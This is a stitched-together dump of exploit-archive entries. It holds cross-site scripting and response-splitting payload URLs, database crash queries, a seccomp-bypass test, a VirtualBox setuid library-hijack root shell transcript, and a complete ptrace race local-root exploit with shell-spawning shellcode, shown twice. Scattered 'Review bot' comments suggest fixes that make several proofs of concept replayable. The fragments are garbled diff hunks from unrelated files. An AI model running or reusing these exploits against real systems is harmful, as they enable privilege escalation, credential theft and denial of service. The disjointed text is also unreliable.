The vulnerability can be patched by a secure parse and restriction of the vulnerable filename value in the upload POST method request.
Encode and filter also the output name value for item list to prevent application-side executions and malicious injected context via POST method.
Security Risk:
==============
The security risk of the local file include web vulnerability in the mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
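Review bot: The evidence in this advisory is an upload filename reflected unencoded into the file list, not a local file include: the quoted JavaScript concatenates `item.name` straight into HTML (`"<a href='/files/" + encodeName + "' class='file'>" + item.name + "</a>"`), and `.replace("'", "'")` is a no-op, so the finding is stored HTML/script injection via the multipart `filename` field. Retitling it accordingly and replacing the `[LOCAL FILE INCLUDE VULNERABILITY!]` placeholders with a concrete payload such as `<img src=x onerror=alert(1)>.pdf` would make it reproducible. The CVSS score is also given as 7.3 in the header and as 6.8/6.9 in the technical section, which should be reconciled.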

11
platforms/java/dos/32860.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34150/info
Sun Java System Calendar Server is prone to a denial-of-service vulnerability because it fails to handle certain duplicate URI requests.
An attacker can exploit this issue to crash the Calendar Server, resulting in a denial-of-service condition.
NOTE: Versions prior to Sun Java System Calendar Server 6.3 are not vulnerable.
The following example data is available:
https://www.example.com:3443/?tzid=crash


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33912/info
JOnAS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
JOnAS 4.10.3 is vulnerable; other versions may also be affected.
http://www.example.com:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule%2Cj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33924/info
APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
1 XSS: GET /security/applet?referrer=>"'><img/src="javascript:alert('DSECRG_XSS')"> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: ??~B, 25 ?~A?? 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34140/info
Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Sun Java System Messenger Express 6.3-0.15 is vulnerable; other versions may also be affected.
http://example.com/?user=admin&error= <http://example.com/?user=admin&error=>"><script>alert(1);</script>
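Review bot: The PoC URL carries a mail-client autolink artifact — the ` <http://example.com/?user=admin&error=>` fragment between `error=` and the payload is not part of the request, so a reader pasting the line as-is sends a broken URL. The usable request is `http://example.com/?user=admin&error="><script>alert(1);</script>`; the duplicated angle-bracketed copy should be dropped.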


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34153/info
Sun Java System Calendar Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
https://www.example.com:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34154/info
Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/uwc/abs/search.xml?bookid=e11e46531a8a0&j_encoding=UTF-8&uiaction=quickaddcontact&entryid=&valueseparator=%3B&prefix=abperson_&stopalreadyselected=1&isselchanged=0&idstoadd=&selectedbookid=&type=abperson%2Cgroup&wcfg_groupview=&wcfg_searchmode=&stopsearch=1&expandgroup=&expandselectedgroup=&expandonmissing=&nextview=&bookid=e11e46531a8a0&actionbookid=e11e46531a8a0&searchid=7&filter=entry%2Fdisplayname%3D*&firstentry=0&sortby=%2Bentry%2Fdisplayname&curbookid=e11e46531a8a0&searchelem=0&searchby=contains&searchstring=Search+for&searchbookid=e11e46531a8a0&abperson_givenName=aa&abperson_sn=aa&abperson_piEmail1=a%40a.com&abperson_piEmail1Type=work&abperson_piPhone1=11&abperson_piPhone1Type=work&quickaddprefix=abperson_&abperson_displayName=%3Cscript%3Ealert%28%27xss2%27%29%3C%2Fscript%3E%2C+%3Cscript%3Ealert%28%27xss1%27%29%3C%2Fscript%3E&abperson_entrytype=abperson&abperson_memberOfPIBook=e11e46531a8a0


@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34155/info
Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
This issue is tracked by Sun Alert ID 258068.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
The following are vulnerable:
Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6
Sun Java System Communications Express 6 2005Q4 (6.2)
http://www.example.com/uwc/base/UWCMain?anon=true&calid=test@test.com&caltype=temporaryCalids&date=20081223T143836Z&category=All&viewctx=day&temporaryCalendars=test@test.com%27;alert(%27hello%27);a=%27


@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/34454/info
Cisco Subscriber Edge Services Manager is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges.
http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3&
getElementById=true&getElementTagName=true&documentElement=true&anchors=true&regexp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=
true&links=true&frames=true&screen=%20true"><script>alert(1);</script>"
http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElem
entById=true&getElementTagName=true&documentElement=true&anchors=true&regexp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&li
nks=true<a%20href%20=%20"http://www.host.net">HTML
Injection</a>&frames=true&screen=true&
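Review bot: Both PoC URLs are broken by line wrapping — `getElementById` is split across L915/L916 (`&` then `getElementById=true`), `getElem`/`entById` across L918/L919, and `li`/`nks` across L919/L920 — so neither request can be copied and replayed as written. Each URL should be kept on one line. The HTML-injection payload `<a%20href%20=%20"http://www.host.net">HTML Injection</a>` also contains an unencoded newline where the wrap landed, which would change the injected markup.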


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34531/info
Novell Teaming is prone to a user-enumeration weakness and multiple cross-site scripting vulnerabilities.
A remote attacker can exploit the user-enumeration weakness to enumerate valid usernames and then perform brute-force attacks; other attacks are also possible.
The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Novell Teaming 1.0.3 is vulnerable; other versions may also be affected.
https://www.example.com/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE

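--- a/platforms/linux/dos/32775.txt
+++ b/platforms/linux/dos/32775.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33618/info
+The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly handle malformed filesystem images.
+Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. Note that to exploit this issue, attackers must be able to mount appropriate filesystem types, which may require membership in a privileged group or root access.
+This issue affects versions prior to Linux kernel 2.6.27.14.
+http://www.exploit-db.com/sploits/32775.gz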

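--- a/platforms/linux/dos/32800.txt
+++ b/platforms/linux/dos/32800.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33749/info
+Poppler is prone to multiple denial-of-service vulnerabilities when handling malformed PDF files.
+Successfully exploiting this issue allows remote attackers to crash applications that use the vulnerable library, denying service to legitimate users.
+These issues affect versions prior to Poppler 0.10.4.
+http://www.exploit-db.com/sploits/32800.pdf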

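--- a/platforms/linux/dos/32838.txt
+++ b/platforms/linux/dos/32838.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/33972/info
+MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain XPath expressions.
+An attacker can exploit this issue to crash the application, denying access to legitimate users.
+This issue affects:
+MySQL 5.1.31 and earlier
+MySQL 6.0.9 and earlier
+select updatexml('','0/a','');
+select extractvalue('','0/a');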

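--- a/platforms/linux/dos/32849.txt
+++ b/platforms/linux/dos/32849.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/34090/info
+PostgreSQL is prone to a remote denial-of-service vulnerability.
+Exploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users.
+test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM
+ascii_to_mic;
+CREATE CONVERSION
+test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM
+mic_to_ascii;
+CREATE CONVERSION
+test=# set client_encoding to 'LATIN1';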
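Review bot: The transcript ends at `set client_encoding to 'LATIN1';` with no server response, so a reader cannot tell whether that statement is itself the trigger or whether a further query through the mismatched conversions is required. The file header counts 13 lines while fewer are shown, so the tail may have been lost in rendering. Appending the observed result (for example the psql message reporting that the server closed the connection, which is what L976 describes) would make the PoC verifiable. Note also that the PoC needs a role allowed to run `CREATE DEFAULT CONVERSION`, which is worth stating next to the "remote" wording on L975.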

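--- a/platforms/linux/dos/32856.txt
+++ b/platforms/linux/dos/32856.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34136/info
+MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files.
+Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
+http://www.exploit-db.com/sploits/32856.aac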

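--- a/platforms/linux/dos/32857.txt
+++ b/platforms/linux/dos/32857.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34136/info
+MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files.
+Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
+http://www.exploit-db.com/sploits/32857.ogm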

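--- a/platforms/linux/local/32815.c
+++ b/platforms/linux/local/32815.c
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/33906/info
+The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.
+This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.
+A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.
+Linux kernel 2.6.28 is vulnerable; other versions may also be affected.
+#include <sched.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <unistd.h>
+static int the_child(void* arg) {
+sleep(1);
+_exit(2);
+}
+int main(int argc, const char* argv[]) {
+int ret = fork();
+if (ret < 0)
+{
+perror("fork");
+_exit(1);
+}
+else if (ret > 0)
+{
+for (;;);
+}
+setgid(99);
+setuid(65534);
+{
+int status;
+char* stack = malloc(4096);
+int flags = SIGKILL | CLONE_PARENT;
+int child = clone(the_child, stack + 4096, flags, NULL);
+}
+_exit(100);
+}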
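Review bot: The return values of `setgid(99)` and `setuid(65534)` are discarded, so when the test is run by an unprivileged user both calls fail silently, parent and child keep the same uid, and the SIGKILL the child delivers through `CLONE_PARENT` says nothing about the origin check the PoC is meant to exercise; `if (setgid(99) != 0 || setuid(65534) != 0) { perror("drop privileges"); _exit(1); }` makes that failure visible. `perror` is also used without `#include <stdio.h>`, `malloc` is unchecked, and `status` and `child` are never read. The parent's `for (;;);` burns a core until it is killed — `pause();` blocks the same way without the spin.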

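--- a/platforms/linux/local/32820.txt
+++ b/platforms/linux/local/32820.txt
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/33922/info
+OpenSC is prone to an unauthorized-access vulnerability.
+Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.
+Versions prior to OpenSC 0.11.7 are vulnerable.
+The following proof of concept is available:
+create a file with a secret:
+echo "This is my secret data" > secret-file
+To initialise a blank card:
+pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890
+To write a private data object to the card:
+pkcs11-tool --label "my secret" --type data --write-object secret-file
+--private --login --pin 12345
+To see all objects on the card:
+pkcs15-tool --dump
+This will list the data object, including the path it is stored, e.g.:
+"Path: 3f0050154701"
+To access such an object with low-level tools:
+opensc-explorer
+cd 5015
+get 4701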
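Review bot: The PIN used to initialise the card on L1058 is `123456`, but the write on L1061 logs in with `--pin 12345`; one of the two is a typo, and with the values as written the `pkcs11-tool` login would presumably be rejected and nothing would be stored. The point of the demonstration — that the object written with `--private` can be read back via `get 4701` in `opensc-explorer` without any PIN verification — is only implied; a sentence before `opensc-explorer` such as `# no "verify" is issued: the private object is readable without the PIN` would make the flaw explicit. The `pkcs11-tool` command is also wrapped across L1060/L1061 and needs to be one line.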

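--- a/platforms/linux/local/32829.c
+++ b/platforms/linux/local/32829.c
@@ -0,0 +1,65 @@
+source: http://www.securityfocus.com/bid/33948/info
+The Linux kernel is prone to a local security-bypass vulnerability.
+A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges.
+/* test case for seccomp circumvention on x86-64
+There are two failure modes: compile with -m64 or compile with -m32.
+The -m64 case is the worst one, because it does "chmod 777 ." (could
+be any chmod call). The -m32 case demonstrates it was able to do
+stat(), which can glean information but not harm anything directly.
+A buggy kernel will let the test do something, print, and exit 1; a
+fixed kernel will make it exit with SIGKILL before it does anything.
+*/
+#define _GNU_SOURCE
+#include <assert.h>
+#include <inttypes.h>
+#include <stdio.h>
+#include <linux/prctl.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <asm/unistd.h>
+int
+main (int argc, char **argv)
+{
+char buf[100];
+static const char dot[] = ".";
+long ret;
+unsigned st[24];
+if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
+perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
+#ifdef __x86_64__
+assert ((uintptr_t) dot < (1UL << 32));
+asm ("int $0x80 # %0 <- %1(%2 %3)"
+: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
+ret = snprintf (buf, sizeof buf,
+"result %ld (check mode on .!)\n", ret);
+#elif defined __i386__
+asm (".code32\n"
+"pushl %%cs\n"
+"pushl $2f\n"
+"ljmpl $0x33, $1f\n"
+".code64\n"
+"1: syscall # %0 <- %1(%2 %3)\n"
+"lretl\n"
+".code32\n"
+"2:"
+: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
+if (ret == 0)
+ret = snprintf (buf, sizeof buf,
+"stat . -> st_uid=%u\n", st[7]);
+else
+ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
+#else
+# error "not this one"
+#endif
+write (1, buf, ret);
+syscall (__NR_exit, 1);
+return 2;
+}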
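Review bot: When `prctl(PR_SET_SECCOMP)` fails the test only prints a message and carries on, so on a kernel without seccomp the chmod/stat succeeds and the program exits 1 — exactly the outcome the header comment defines as "buggy kernel"; returning after the perror (`{ perror (...); return 2; }`) keeps "not testable" distinct from "bypassed". Separately, the `-m32` path invokes the 64-bit `stat` syscall, which fills a 64-bit `struct stat` (144 bytes on x86-64) into `unsigned st[24]` (96 bytes), so the kernel writes past the buffer onto the stack; `unsigned st[36]` sized for the 64-bit layout avoids that, and the `st[7]` index for `st_uid` is only right for that 64-bit layout, which deserves a comment.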

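--- a/platforms/linux/local/32848.txt
+++ b/platforms/linux/local/32848.txt
@@ -0,0 +1,42 @@
+source: http://www.securityfocus.com/bid/34080/info
+Sun xVM VirtualBox is prone to a local privilege-escalation vulnerability.
+An attacker can exploit this vulnerability to run arbitrary code with superuser privileges.
+The following versions for the Linux platform are vulnerable:
+Sun xVM VirtualBox 2.0
+Sun xVM VirtualBox 2.1
+$ id -u
+1002
+$ cat test.c
+#include <unistd.h>
+#include <sys/syscall.h>
+__attribute__((constructor))
+void awesome(void)
+{
+char *argv[] = { "sh", NULL };
+extern char *environ;
+syscall(SYS_setuid, 0);
+syscall(SYS_execve, "/bin/sh", argv, environ);
+}
+$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2
+$ ls -l /opt/VirtualBox/VirtualBox
+-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox
+$ ln /opt/VirtualBox/VirtualBox
+$ ls -l VirtualBox
+-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox
+$ ./VirtualBox
+./VirtualBox: /home/vapier/libdl.so.2: no version information available
+(required by ./VirtualBox)
+sh-4.0# whoami
+root
+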
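Review bot: The transcript never states why a `libdl.so.2` dropped in the working directory is loaded by a setuid-root `VirtualBox`; the hard link on L1161 and the `required by ./VirtualBox` message on L1165 suggest the binary resolves libraries relative to its own location (an `$ORIGIN` RPATH/RUNPATH, which the loader is supposed to refuse for setuid programs), but that is inferred, not shown. A one-line note before the `ln`, e.g. `# VirtualBox carries an $ORIGIN RPATH, so a hard link in a directory we control makes it load our libdl.so.2 -- confirm with readelf -d`, would give the reader the precondition. It is also worth saying that the hard link requires `/opt` and the working directory to be on the same filesystem, since that is why `ln` rather than `cp` (which would drop the setuid bit) is used.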


@ -1,101 +1,101 @@
/*
* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
* ==========================================================================
* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
* a process to gain elevated privileges under certain conditions. The vulnerability is
* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
* "execve()". This can be exploited to potentially execute arbitrary code with root
* privileges by attaching to a setuid process. The race is particularly narrow, this
* exploit checks that it has attached to the correct process before attempting to
* inject shellcode which helps reduce false positives and shells being spawned with
* lower privileges.
*
* Ex.
* matthew@matthew-desktop:~$ id
* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* matthew@matthew-desktop:~$ uname -a
* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
* [... much scroll removed, go make coffee, get a job, do something while running ...]
* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
* proc on /proc type proc (rw,noexec,nosuid,nodev)
* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
* udev on /dev type tmpfs (rw,mode=0755)
* devshm on /dev/shm type tmpfs (rw)
* devpts on /dev/pts type devpts (rw,gid=5,mode=620)
* securityfs on /sys/kernel/security type securityfs (rw)
* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
* [ WIN! 18281
* [ Overwritten 0xb8097430
* # id
* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* #
*
* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
* this exploit, sell it, recode it, rip the header and claim it as your own on the condition
* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
* shoryuken.c at any time.
*
* -- prdelka
*/
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/user.h>
#include <stdio.h>
#include <fcntl.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90"
"\x6a\x23\x58\x31"
"\xdb\xcd\x80"
"\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
"\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(){
pid_t child;
int eip, i = 0;
struct user_regs_struct regs;
char *argv[] = {"mount",0};
char *envp[] = {"",0};
child = fork();
if(child == 0) {
execve("/bin/mount",argv,envp);
}
else {
if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
char buf[256];
sprintf(buf, "/proc/%d/cmdline", child);
int fd = open(buf, O_RDONLY);
read(fd, buf, 2);
close(fd);
if(buf[0] == 'm') {
printf("[ WIN! %d\n", child);
fflush(stdout);
ptrace(PTRACE_GETREGS, child, NULL, &regs);
eip = regs.eip;
while (i < strlen(shellcode)){
ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
i += 4;
eip += 4;
}
printf("[ Overwritten 0x%x\n",regs.eip);
ptrace(PTRACE_SETREGS, child, NULL, &regs);
ptrace(PTRACE_DETACH, child, NULL,NULL);
usleep(1);
wait(0);
}
}
}
return 0;
}
// milw0rm.com [2009-05-14]
/*
* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
* ==========================================================================
* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
* a process to gain elevated privileges under certain conditions. The vulnerability is
* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
* "execve()". This can be exploited to potentially execute arbitrary code with root
* privileges by attaching to a setuid process. The race is particularly narrow, this
* exploit checks that it has attached to the correct process before attempting to
* inject shellcode which helps reduce false positives and shells being spawned with
* lower privileges.
*
* Ex.
* matthew@matthew-desktop:~$ id
* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* matthew@matthew-desktop:~$ uname -a
* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
* [... much scroll removed, go make coffee, get a job, do something while running ...]
* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
* proc on /proc type proc (rw,noexec,nosuid,nodev)
* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
* udev on /dev type tmpfs (rw,mode=0755)
* devshm on /dev/shm type tmpfs (rw)
* devpts on /dev/pts type devpts (rw,gid=5,mode=620)
* securityfs on /sys/kernel/security type securityfs (rw)
* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
* [ WIN! 18281
* [ Overwritten 0xb8097430
* # id
* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* #
*
* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
* this exploit, sell it, recode it, rip the header and claim it as your own on the condition
* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
* shoryuken.c at any time.
*
* -- prdelka
*/
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/user.h>
#include <stdio.h>
#include <fcntl.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90"
"\x6a\x23\x58\x31"
"\xdb\xcd\x80"
"\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
"\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(){
pid_t child;
int eip, i = 0;
struct user_regs_struct regs;
char *argv[] = {"mount",0};
char *envp[] = {"",0};
child = fork();
if(child == 0) {
execve("/bin/mount",argv,envp);
}
else {
if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
char buf[256];
sprintf(buf, "/proc/%d/cmdline", child);
int fd = open(buf, O_RDONLY);
read(fd, buf, 2);
close(fd);
if(buf[0] == 'm') {
printf("[ WIN! %d\n", child);
fflush(stdout);
ptrace(PTRACE_GETREGS, child, NULL, &regs);
eip = regs.eip;
while (i < strlen(shellcode)){
ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
i += 4;
eip += 4;
}
printf("[ Overwritten 0x%x\n",regs.eip);
ptrace(PTRACE_SETREGS, child, NULL, &regs);
ptrace(PTRACE_DETACH, child, NULL,NULL);
usleep(1);
wait(0);
}
}
}
return 0;
}
// milw0rm.com [2009-05-14]


@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/33937/info
The 'djbdns' package is prone to a remote cache-poisoning vulnerability.
An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
This issue affects djbdns 1.05; other versions may also be vulnerable.
# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88
# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05
# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp
# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data
# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com
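Review bot: The comment on L1387-L1388 says the zone for www.example.com is transferred from www.example2.com, yet the `tcpclient` command on L1389 connects to `www.example.com 53`, so the two host names disagree and one of them should be corrected (presumably the tcpclient target should be `www.example2.com`). More importantly, the steps only rebuild a zone and answer one A query locally with `tinydns-get`, which by itself shows nothing about the cache poisoning described on L1374-L1375; a closing sentence explaining what in the produced answer demonstrates the flaw — presumably additional records from the transferred zone being accepted and served — is missing.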


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33962/info
cURL/libcURL is prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to bypass certain security restrictions and carry out various attacks.
This issue affects cURL/libcURL 5.11 through 7.19.3. Other versions may also be vulnerable.
